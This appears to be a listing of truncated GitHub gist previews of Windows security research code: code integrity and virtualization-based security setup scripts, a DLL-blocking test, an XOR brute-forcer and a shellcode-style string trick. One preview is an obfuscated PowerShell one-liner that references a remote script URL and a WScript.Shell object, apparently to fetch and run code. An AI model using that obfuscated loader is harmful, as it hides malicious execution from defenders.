using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace BlockDllTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
#include <Windows.h> | |
#include <ImageHlp.h> | |
#include <strsafe.h> | |
#include "loaded_psp_drivers.h" | |
#include <set> | |
#include <string> | |
#include <algorithm> | |
#pragma comment(lib, "crypt32.lib") |
; A minimal Mach-o x64 executable for OS X (also see below Mountain Lion version) | |
; | |
; $ nasm -f bin -o tiny_hello tiny_hello.s | |
; $ chmod +x tiny_hello | |
; $ ./tiny_hello | |
; Hello World! | |
; $ | |
; c.f. | |
; http://osxbook.com/blog/2009/03/15/crafting-a-tiny-mach-o-executable/ ( the original tiny mach-o executable ) |
# Enable the Windows optional features used for virtualization-based security (VBS),
# then set the DeviceGuard registry flag that requests VBS.
# Every feature change below passes -NoRestart, so the changes are only staged until the next reboot.
# NOTE(review): -Online feature changes and HKLM writes presumably need an elevated session - confirm.
# Enable the Hyper-V hypervisor feature; -All also enables the parent features it depends on.
Enable-WindowsOptionalFeature -Online -NoRestart -FeatureName:Microsoft-Hyper-V-Hypervisor -All | |
# Disable the Hyper-V tools and services features again.
# NOTE(review): presumably so that only the hypervisor component stays enabled - confirm the intent.
Disable-WindowsOptionalFeature -Online -NoRestart -FeatureName: Microsoft-Hyper-V-Tools-All, Microsoft-Hyper-V-Services | |
# Look up the "IsolatedUserMode" feature and pipe it into the enable cmdlet.
Get-WindowsOptionalFeature -Online -FeatureName "IsolatedUserMode" | Enable-WindowsOptionalFeature -Online -NoRestart | |
# Enable DeviceGuard Security Flags
# The commented-out reg.exe line writes the same value as the New-ItemProperty call below it.
#reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f | |
# Write EnableVirtualizationBasedSecurity = 1 (DWORD); -Force replaces a value that already exists.
# NOTE(review): only this one flag is set in the visible lines; after the reboot, confirm the
# resulting VBS state (for example via the Win32_DeviceGuard CIM class) instead of assuming it is active.
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -PropertyType "DWORD" -Value 1 -Force | |
# Info Source: https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security#use-registry-keys-to-enable-vbs-and-device-guard |
# Build a code integrity policy from a snapshot of C:\ and install it as the system policy file.
# NOTE(review): creating a shadow copy and writing under System32\CodeIntegrity presumably
# require an elevated session - confirm.
# Create a client-accessible volume shadow copy of C:\ through the Win32_ShadowCopy WMI class.
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible") | |
# Fetch the shadow copy instance whose ID matches the one returned by Create().
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID } | |
# Device path of the snapshot with a trailing backslash appended, used as the link target.
$d = $s2.DeviceObject + "\" | |
# Expose the snapshot as C:\scpy with a directory symbolic link.
cmd /c mklink /d C:\scpy "$d" | |
# Scan the snapshot and generate allow rules at the RootCertificate level;
# -UserPEs includes user-mode binaries in the scan.
# NOTE(review): everything present in the snapshot ends up trusted by the policy, so the
# machine should be in a known-good state when this is run.
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs | |
# Delete the shadow copy first, then remove the link that pointed into it.
$s2.Delete() | |
Remove-Item -Path C:\scpy -Force | |
# NOTE(review): in the ConfigCI option list, option 3 is "Enabled:Audit Mode", so the policy
# would log violations rather than block them - verify with `Set-RuleOption -Help`.
# The dashes on the next line are en dashes (U+2013), not ASCII hyphens; retype them as "-" if the line is copied.
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml | |
# Convert the XML policy into its binary form.
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin | |
# Install the binary policy as SIPolicy.p7b; -force overwrites a policy already in place.
# NOTE(review): no signing step is visible here, so the installed policy is presumably unsigned - confirm.
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force |
# Ensure System.Security assembly is loaded. | |
Add-Type -AssemblyName System.Security | |
function ConvertTo-CIPolicy { | |
<# | |
.SYNOPSIS | |
Converts a binary file that contains a Code Integrity policy into XML format. | |
Author: Matthew Graeber (@mattifestation) |
Set-Item Variable:\p 'Notepad';Set-Variable v5 'HKCU:\Software\Microsoft\Notepad';Set-Item Variable:\Ma 'https://gist.githubusercontent.com/invokethreatguy/0481730897e4c0db74f6596fcae223f9/raw/c2a3ebbfa3e7ffcfaf2d4ad2985a8ffd2dca3a4b/get-process.ps1';pushd;SI Variable:/3eT (.$ExecutionContext.InvokeCommand.GetCommand($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[Management.Automation.CommandTypes]::Cmdlet)-ComObje WScript.Shell);$Null=[System.Reflection.Assembly]::([System.Reflection.Assembly].GetMethods()|?{(Variable _ -Va).Name-like'L*ame'}|%{(GV _ -ValueOnl).Name}|Select -Fir 1).Invoke('System.Windows.Forms');Set-Variable A (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member)[2].Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('G*-I*y',1,1))(Get-Variable v5).Value);@(@(((.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member)[2].Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('G*-I*y',1,1))HKCU:\Software\Microsoft\Notepad|Memb |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.Linq; | |
using System.Text; | |
namespace XORBruteForce | |
{ | |
class Program | |
{ |
gi{"name":"Overview","desc":"System Overview","controller_version":"5.10.12","modules":[{"id":"default:mega|status","module_id":"mega|status","restrictions":{"removable":false,"draggable":false},"config":{}},{"module_id":"internet-connection","config":{},"id":"dd5f7461-f8f0-4017-859c-3d9271b673bf"},{"module_id":"summary|wifi","config":{},"id":"13a78652-ad84-4fcb-943a-86929c638353"},{"module_id":"clients|freq-distribution","config":{"palette":"BLUE_GRADIENT_10"},"id":"c9626f4f-021f-4d46-b22d-86007570bac7"},{"module_id":"clients|top5|active","config":{"trafficType":"total"},"id":"36a9e071-132e-4b4a-baee-250449a6d44f"},{"module_id":"devices|uap|top5|channel-util","config":{"trafficType":"total"},"id":"9803f077-b9cd-4db0-b466-60d92fae2020"},{"module_id":"devices|uap|top5|active","config":{"trafficType":"total"},"id":"e6133049-cc56-44b3-a4c2-b0843912dac5"},{"module_id":"devices|uap|top5|client-count","config":{},"id":"d39f9c80-1827-4ba0-b573-3209789c56b5"},{"module_id":"summary|switching","config":{},"id":"5966437 |
#include <stdio.h> | |
/*
 * DECLARE_STRING(var, str): defines a char array, placed in the .text section,
 * that holds a 10-byte machine-code stub immediately followed by the literal str.
 * The stub bytes decode on x86 as:
 *   e8 00 00 00 00   call to the next instruction (pushes the address of the following byte)
 *   58               pop eax     -> address of this byte, i.e. array offset 5
 *   83 c0 05         add eax, 5  -> array offset 10, the first byte of str
 *   c3               ret
 * Calling the array therefore returns a pointer to the string stored right after the stub.
 * NOTE(review): in 64-bit mode "83 c0 05" operates on eax and clears the upper half of rax,
 * so the returned pointer looks valid only for 32-bit builds or addresses below 4 GiB - confirm the target.
 * NOTE(review): this relies on the section attribute being honoured and on .text being
 * executable; it is compiler- and platform-specific.
 */
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str; | |
/*
 * REF_STRING(var): casts the array to a function returning char* and calls it,
 * which runs the stub above and yields the address of the embedded string.
 */
#define REF_STRING(var) ((char*(*)())var)() | |
/* Two strings embedded this way, each preceded by its own copy of the stub. */
DECLARE_STRING(data1, "Hello, World!\n"); | |
DECLARE_STRING(data2, "Goodbye, World!\n"); | |
int main(int , char** ) |